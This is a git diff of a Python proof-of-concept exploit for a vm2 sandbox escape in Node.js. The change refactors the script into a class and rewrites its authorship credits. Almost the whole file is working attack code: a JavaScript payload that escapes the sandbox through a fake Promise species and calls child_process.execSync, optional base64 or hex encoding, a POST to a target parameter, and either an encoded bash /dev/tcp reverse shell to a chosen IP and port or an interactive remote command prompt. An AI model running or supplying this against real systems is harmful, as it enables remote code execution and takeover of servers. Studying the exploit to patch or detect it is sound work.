diff --git a/exploit.py b/exploit.py index d2c6773..c23bc89 100644 --- a/exploit.py +++ b/exploit.py @@ -2,21 +2,35 @@ import requests import sys import base64 +import json from requests_toolbelt.utils import dump import cmd import readline -import json - -# PoC Exploit for VM2 Sandbox Escape Vulnerabilities (All Versions) -# Author : Ravindu Wickramasinghe | rvz -# Credits : Xion (SeungHyun Lee) of "KAIST Hacking Lab" for disclosing these vulnerabilities and providing detailed analysis. -custom = False -temp = [] -data = payload = curl = enc_type = param = ip = port = None - -def extract_data(request_data): - #print("\033[32m[>]\033[0m curl : ", request_data) +# VM2 Sandbox Escape Proof of Concept +# Author : Taylor Christian Newsome | ClumsyLulz +# Credits : Xion (SeungHyun Lee) of "KAIST Hacking Lab" And Ravindu Wickramasinghe | rvz + +class VM2Exploit: + def __init__(self): + self.verbose = True + self.custom = False + self.param = None + self.enc_type = None + self.ip = None + self.port = None + self.data = None + self.temp = [] + self.payload = None + self.url = None + self.headers = None + self.params = {} + self.curl = False + + def extract_data(self, request_data): + """ + Extract URL, parameters, and headers from a curl command. + """ url_pattern = re.compile(r"curl '([^']+)'") urlm = url_pattern.search(request_data) url = urlm.group(1) if urlm else None @@ -29,147 +43,156 @@ def extract_data(request_data): headers = {key: value for key, value in headers_matches} return url, params, headers - -def send(url,headers,params,payload): - pdata = encode_payload(vm2payload) - - if not custom: - params[list(params.keys())[0]] = pdata - else: - params[param] = pdata - - # if provinding a url these headers will be used! update if necessary - # ------------------------------------------------------------------- - if headers==None: - headers = { - 'Content-Type': 'application/json' - } - # ------------------------------------------------------------------- - - for key, value in params.items(): - temp.append("\"" + key + "\":\"" + value + "\"") - params = "{" + ",".join(temp) + "}" - - if verbose: - print("\033[31m[!]\033[0m if this is not the parameter you want to select add --param=your_param") - print(f"\033[32m[>]\033[0m selected parameter: {param}") - #print("\033[32m[>]\033[0m payload: ",pdata) - #print("\033[32m[>]\033[0m request's data: ",params) - - response = requests.post(url, data=params, headers=headers) - data = dump.dump_all(response) - if verbose: - print(data.decode('utf-8')) - try: - values = list(json.loads(response.text).values()) - print(values[0]) - except json.JSONDecodeError: - print(response.text) - - -def vm2_payload_gen(cmd): - payload = ''' - const {VM} = require("vm2"); - const vm = new VM(); - - const code = ` - cmd = "'''+cmd+'''" - async function fn() { - (function stack() { - new Error().stack; - stack(); - })(); - } - p = fn(); - p.constructor = { - [Symbol.species]: class FakePromise { - constructor(executor) { - executor( - (x) => x, - (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync(cmd); } - ) - } - } - }; - p.then(); - `; - - console.log(vm.run(code));''' - if verbose: - print("\033[32m[>]\033[0m vm2-payload: \n","-"* 20,payload,"\n","-"* 20) - return payload - - - -def encode_payload(vm2payload): - if enc_type: - if verbose: - #print(f"\033[32m[>]\033[0m payload encoding: {enc_type}") - pass - pdata = vm2payload.encode('utf-8').hex() if enc_type == 'hex' else base64.b64encode(vm2payload.encode('utf-8')).decode('utf-8') - else: - pdata=vm2payload - return pdata - - -try: - request_data = sys.argv[1] - for arg in sys.argv[1:]: - if arg == '--hex': enc_type = 'hex' - if arg.startswith('--param='): param = arg.split("=")[1] - elif arg == '--base64': enc_type = 'base64' - elif arg.startswith('--ip='): ip = arg.split("=")[1] - elif arg.startswith('--port='): port = arg.split("=")[1] - -except: - print("./usage ") - exit() - -if request_data.startswith("curl"): - url, params, headers = extract_data(request_data) - print("\033[32m[>]\033[0m target url: ", url) - print("\033[32m[>]\033[0m params: ",params) - try: - print("\033[32m[>]\033[0m extracted parameter: ", list(params.keys())[0]) - except: - pass - curl = True - -elif request_data.startswith("http"): - url = request_data - params = {} - headers = None - print("\033[32m[>]\033[0m target url:", url) - curl = False -else: - print("./usage ") - exit() - -if param==None or custom==True: - try: - param=list(params.keys())[0] - except: - print("\033[31m[!]\033[0m since you're providing a url you've to specifiy the parameter use --param") - exit() -else: - params={param:""} -verbose = True - -if ip != None and port != None: - payload = f"bash -i >& /dev/tcp/{ip}/{port} 0>&1" - payload = "echo " + base64.b64encode(payload.encode('utf-8')).decode('utf-8') + " | base64 -d | bash" - print("\033[32m[>]\033[0m payload : ",payload) - vm2payload = vm2_payload_gen(payload) - send(url,headers,params,payload) -else: - while True: - verbose = False - user_input = input(" > ") - if user_input.lower() == 'exit': - break + def encode_payload(self, vm2payload): + """ + Encode the payload based on the encoding type (base64/hex). + """ + if self.enc_type: + if self.verbose: + pass + pdata = vm2payload.encode('utf-8').hex() if self.enc_type == 'hex' else base64.b64encode(vm2payload.encode('utf-8')).decode('utf-8') + else: + pdata = vm2payload + return pdata + + def vm2_payload_gen(self, cmd): + """ + Generate the VM2 sandbox escape payload. + """ + payload = f''' + const {{VM}} = require("vm2"); + const vm = new VM(); + + const code = ` + cmd = "{cmd}" + async function fn() {{ + (function stack() {{ + new Error().stack; + stack(); + }})(); + }} + p = fn(); + p.constructor = {{ + [Symbol.species]: class FakePromise {{ + constructor(executor) {{ + executor( + (x) => x, + (err) => {{ return err.constructor.constructor('return process')().mainModule.require('child_process').execSync(cmd); }} + ) + }} + }} + }}; + p.then(); + `; + + console.log(vm.run(code)); + ''' + if self.verbose: + print(f"\033[32m[>]\033[0m vm2-payload: \n{'-' * 20}\n{payload}\n{'-' * 20}") + return payload + + def send(self, url, headers, params, payload): + """ + Send the request with the payload and parameters to the target URL. + """ + pdata = self.encode_payload(self.vm2_payload_gen(payload)) + + if not self.custom: + params[list(params.keys())[0]] = pdata + else: + params[self.param] = pdata + + if headers is None: + headers = {'Content-Type': 'application/json'} + + for key, value in params.items(): + self.temp.append(f'"{key}":"{value}"') + params = "{" + ",".join(self.temp) + "}" + + if self.verbose: + print("\033[31m[!]\033[0m if this is not the parameter you want to select add --param=your_param") + print(f"\033[32m[>]\033[0m selected parameter: {self.param}") + + response = requests.post(url, data=params, headers=headers) + data = dump.dump_all(response) + if self.verbose: + print(data.decode('utf-8')) + try: + values = list(json.loads(response.text).values()) + print(values[0]) + except json.JSONDecodeError: + print(response.text) + + def handle_custom_payload(self, payload): + """ + Handle the custom payload creation and execution based on user input. + """ + if self.ip and self.port: + payload = f"bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1" + payload = f"echo {base64.b64encode(payload.encode('utf-8')).decode('utf-8')} | base64 -d | bash" + print(f"\033[32m[>]\033[0m payload : {payload}") + self.send(self.url, self.headers, self.params, payload) + else: + while True: + self.verbose = False + user_input = input(" > ") + if user_input.lower() == 'exit': + break + try: + payload = user_input + self.send(self.url, self.headers, self.params, payload) + except Exception as e: + print(f"\033[31m[!]\033[0m error : {e}") + + def parse_arguments(self): + """ + Parse command-line arguments to configure the exploit. + """ try: - payload = user_input - vm2payload = vm2_payload_gen(payload) - send(url,headers,params,payload) - except Exception as e: - print(f"\033[31m[!]\033[0m error : {e}") \ No newline at end of file + request_data = sys.argv[1] + for arg in sys.argv[1:]: + if arg == '--hex': self.enc_type = 'hex' + if arg.startswith('--param='): self.param = arg.split("=")[1] + elif arg == '--base64': self.enc_type = 'base64' + elif arg.startswith('--ip='): self.ip = arg.split("=")[1] + elif arg.startswith('--port='): self.port = arg.split("=")[1] + except Exception: + print("./usage ") + exit() + + if request_data.startswith("curl"): + self.url, self.params, self.headers = self.extract_data(request_data) + print(f"\033[32m[>]\033[0m target url: {self.url}") + print(f"\033[32m[>]\033[0m params: {self.params}") + self.curl = True + + elif request_data.startswith("http"): + self.url = request_data + self.params = {} + self.headers = None + print(f"\033[32m[>]\033[0m target url: {self.url}") + self.curl = False + else: + print("./usage ") + exit() + + if not self.param or self.custom: + try: + self.param = list(self.params.keys())[0] + except Exception: + print("\033[31m[!]\033[0m since you're providing a url you've to specify the parameter use --param") + exit() + else: + self.params = {self.param: ""} + + def execute(self): + """ + Execute the exploit based on the provided parameters. + """ + self.parse_arguments() + self.handle_custom_payload(self.payload) + + +if __name__ == "__main__": + exploit = VM2Exploit() + exploit.execute()